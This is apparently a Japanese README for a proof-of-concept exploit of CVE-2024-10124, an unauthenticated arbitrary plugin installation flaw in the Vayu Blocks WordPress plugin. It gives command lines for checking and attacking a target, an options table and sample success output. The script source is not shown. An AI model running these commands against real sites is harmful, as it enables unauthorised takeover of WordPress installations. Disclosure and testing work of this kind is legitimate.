
CVE-2024-10124のWordPress Vayu Blocksプラグイン用の概念実証エクスプロイト。不正なプラグインのインストールと有効化を可能にし、リモートコード実行を達成する可能性があります。
「Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce」WordPress プラグインは、バージョン 1.1.1 までの全バージョンにおいて、tp_install() 関数の権限チェックが欠如しているため、未認証の攻撃者が任意のプラグインをインストールおよび有効化できる脆弱性があります。これにより、別の脆弱なプラグインがインストールされ有効化されている場合、リモートコード実行を達成するために悪用される可能性があります。この脆弱性はバージョン 1.1.1 で部分的に修正されました。
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version
これにより、vayu-blocks プラグインのバージョンを確認し、サイトが脆弱かどうかを判定します。
python CVE-2024-10124.py -u http://192.168.100.74/wordpress
これにより、デフォルトのプラグイン hello-dolly がインストールされます。
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name
これにより、対象サイトに plugin_name プラグインがインストールされます。
| 🔍 | コマンド | 説明 | 例 |
|---|---|---|---|
| 🌐 | -u or --url | WordPress サイトのターゲット URL を指定します。 | -u http://192.168.100.74/wordpress |
| 🔒 | --check-version | バージョンに基づいてサイトが脆弱かどうかを確認します。 | -u http://192.168.100.74/wordpress --check-version |
| ⚙️ | -p or --plugin | プラグイン名を指定します(デフォルトは hello-dolly)。 | -u http://192.168.100.74/wordpress -p plugin_name |
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://192.168.100.74/wordpress)
-p PLUGIN, --plugin PLUGIN
Plugin name (default: hello-dolly)
--check-version Check if the site is vulnerable based on plugin version
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"
このスクリプトは教育目的のみで提供されています。作者は、このスクリプトの誤用によって引き起こされたいかなる損害についても責任を負いません。